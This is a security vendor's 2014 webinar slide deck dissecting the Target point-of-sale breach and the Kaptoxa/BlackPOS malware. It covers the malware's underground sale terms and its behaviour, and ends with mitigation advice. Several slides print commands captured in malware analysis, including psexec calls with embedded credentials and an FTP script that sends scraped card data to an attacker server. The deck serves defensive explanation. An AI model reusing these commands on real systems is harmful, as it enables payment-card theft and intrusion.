Published on February 4, 2014
The Target Data Breach: Anatomy of an Attack February 4, 2014 Stephen Coty Director, Threat Research > www.alertlogic.com Diane Garey Product Marketing
Today Agenda • What’s in the News • About POS Malware • How the Malware Works • How to Protect Yourself Logistics • Ask a question anytime using the “Question Box” • Look for slides on the Alert Logic SlideShare account • You’ll get an email with a link to today’s recording • Live Tweet today’s event #AlertLogic_ACID > www.alertlogic.com 2
30 Days of the Target Breach Dec 18th > www.alertlogic.com Jan 10th Jan 15th 3 Jan 17th
You Never Want to Send This Communication > www.alertlogic.com 4
What’s Being Reported About the Attack • Malicious software infects POS systems and sends credit card data via FTP • Possibly home grown POS system running Windows OS • Malware traced to Russia & sold to 60 European cyber criminals > www.alertlogic.com About the Impact • 110 million customers affected • Data being sold on the underground market • Eight other retailers have been compromised • Arrests being made on people using the cards 5
Malware for Sale • Went into testing Feb 12, 2013 under the title: – “Dump CC memory grabber (pos-trojan)” • Underground community laughed at the outrageous price • Currently not being sold due to Ree selling out buyers Economy Version Budget Version • • • • • • > www.alertlogic.com Implemented by sending protakolu FTP Log is not encrypted 1st updated edition free Rebuild product 200 $ (max 3) No support $1800 • • • • • Implemented by sending protakolu FTP Log encrypted invented us cipher Free updates for 3 months. Rebuild 100 $ (max 5) Support $2000 6 Full Version • • • • • Shipping through the gate Log encrypted cipher invented by us Free updates for life. Rebuild further by $ 100 $2300
More Malware Sales Details • License agreement (translated from Russian) – “You use the program on your own risk and creators assume no responsibility for your further use of this software. When buying, you automatically accept rules. Transfer programs and reselling third parties is prohibited and threatened deprivation of licenses and just what is included in your version.” • Seller Information – – – – E-mail 1: firstname.lastname@example.org E-mail 2: email@example.com ICQ: 565033 Skype: s.r.a.ree4 > www.alertlogic.com 7
Stolen Credit Cards are Selling for $15-60 Initial dumps: ~$12 average Recent dumps: ~$15-60 range > www.alertlogic.com 8
How the Malware (Kaptoxa-Rescator) Works Disables firewall • Creates an autorun entry to launch at boot Saves data • To a default .dll file Infects POS System • dum.exe exectutes mmom.exe Establishes share • net.exe/net1.exe creates Windows share 9 > www.alertlogic.com Scrapes memory • Scrapes tracks 1 &2 from credit card data Stores and forwards data • To internal server as a txt file that sends data to an external FTP server controlled by attackers
Normal POS Activity: Pre-Infection
Post-Infection Activity: Step 1 New Service 11
Post-Infection Activity: Step 1.1 Looks like a regular user Starts POSWDS
Post-Infection Activity: Step 1.2 net.exe: establishes Windows share Filtering for commands: <---- cmd that was issued and captured in malware analysis cmd.exe /c move C:WINDOWSsystem32net.EXE net start POSWDS C:WINDOWSsystem32cmd.exe /c net use S: 10.116.240.31c$WINDOWStwain_32a.dll /user:ttcopscli3acsBest1_user BackupU$
Post-Infection Activity: Step 2 BackDoor-FBPL takes the following actions: Step 1 C:WINDOWSsystem32cmd.exe /c psexec /accepteula 10.116.240.31 -u ttcopscli3acsBest1_user -p BackupU$r cmd /c "taskkill /IM bladelogic.exe /F” Step 2 c:windowssystem32cmd.exe /c psexec /accepteula 10.116.240.3 -u ttcopscli3acsBest1_user -p BackupU$r cmd -d bladelogic BackDoor-FBPL sleeps until the predetermined time of 10:00am and 5:00pm then runs: Step 1 C:WINDOWSsystem32cmd.exe /c move 10.116.240.31NTtwain_32a.dll C:data_2014_1_20_17_53.txt <-- Name created by date and time from system
BMC Whitepaper > www.alertlogic.com 15
Post-Infection Activity: Step 2 continued Step 2: Write data to a text file (cmd.txt) open 220.127.116.11 digitalw Crysis1089 cd etc cd bin send C:data_2014_1_20_17_53.txt quit Step 3 Command Line c:windowssystem32cmd.exe /c ftp -s:c:program filesxxxxxxxxxxtempcmd.txt> c:xxxxxxxxxxtempcmd.txt 16
Theory: How the Malware was Delivered Ariba Vendor Portal > www.alertlogic.com 17
Theory: How the Malware was Delivered Login to Portal > www.alertlogic.com 18
Theory: How the Malware was Injected NCR POS Terminals > www.alertlogic.com 19
Evolution of Target POS Malware AlinaPOS DexterPOS v1 Created v2 Encryption, v2.1 Logging v3.2 & 5.2 Exfiltration Steals the process list from an infected machine while parsing memory dumps 2008 Memory Dumper Copy a specific process in memory > www.alertlogic.com 2010 2012 2013 VSkimmer Detect card readers, grab information, send data to a control server 20 BlackPOS / Kaptoxa / Rescator
Kaptoxa & Others Originated from Dexter • Dexter: – Able to read process memory from infected machines – Parses memory dumps looking for track 1 & 2 of the credit card data • Infected POS systems in 40 countries – 42% of the systems infected were in NA – 19% in the UK • Targeted Windows OS > www.alertlogic.com 21
How to Mitigate Risk • Scan POS systems with your choice of antivirus • Check for the removal of autorun keys • • HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun with the value "svchit” Contact us for a Check for removal of three executables copy of our • %USERPROFILE%/svchst.exe Malware Analysis • Dum.exe Report • Mmon.exe • Disable external FTP access outbound from the POS system on the network vs the host itself • Create a whitelist of acceptable external addresses using IP filtering rules or Access Control Lists (ACL) > www.alertlogic.com 22
Credits to the Sources of Data • http://www.alertlogic.com/data-breach-at-targetexposes-40-million-credit-cards/ • http://www.seculert.com/blog/2012/12/dexter-drainingblood-out-of-point-of-sales.html • http://krebsonsecurity.com/2014/01/a-first-look-at-thetarget-intrusion-malware/ • http://www.cyphort.com/blog/cyphort-tracks-down-newvariants-of-target-malware/ • http://www.tripwire.com/state-of-security/vulnerabilitymanagement/targets-point-sale-system-compromised/ > www.alertlogic.com 23
Join Tomorrow’s Webinar Delivering Real Protection: Alert Logic Security-as-a-Service • http://alrt.co/ThreatLogDemo • Full managed intrusion detection and log management • Deploy anywhere your datacenter is located > www.alertlogic.com 24
Thank you! To Follow our Research: #AlertLogic_ACID http://www.alertlogic.com/resources/blog/ firstname.lastname@example.org -> > www.alertlogic.com “Malware Analysis Report”
Presentación que realice en el Evento Nacional de Gobierno Abierto, realizado los ...
In this presentation we will describe our experience developing with a highly dyna...
Presentation to the LITA Forum 7th November 2014 Albuquerque, NM
Un recorrido por los cambios que nos generará el wearabletech en el futuro
Um paralelo entre as novidades & mercado em Wearable Computing e Tecnologias Assis...
... was compromised in the Target breach. ... Anatomy of the Breach. ... attack internal systems. Assuming Target wrote some of the code ...
With over a hundred million customers affected and headline news stories day after day, the Target Corporation data breach is a company's worst ...
With over a hundred million customers affected and headline news stories day after day, the Target Corporation data breach is a company's worst security ...
... than the exposure caused by the breach at Target, ... were involved in the December 2013 attack on Target that exposed 40 ... Krebs on Security ...
Anatomy of the Target data breach: ... Anatomy of the attack Now let's look at the sequence of events that precipitated the data breach.
2nd Watch & Alert Logic Recorded Webinar - 4/16/14 ... Target Corporation: How can you protect yourself from the data breach? - Duration: 9:33.
New Details Of Home Depot Attack Reminiscent Of Target's ... for this attack it seems to ... prevented the Target breach. No idea if either Target or ...
ABOUT ANATOMY OF AN ATTACK ... compared with $1 to $2 for U.S. credit card numbers prior to the Target Breach. 13. The Federal Bureau of Investigation ...
Inside a Targeted Point-of-Sale Data Breach ... such a large-scale attack that went undetected for ... directly implicated in the breach at Target ...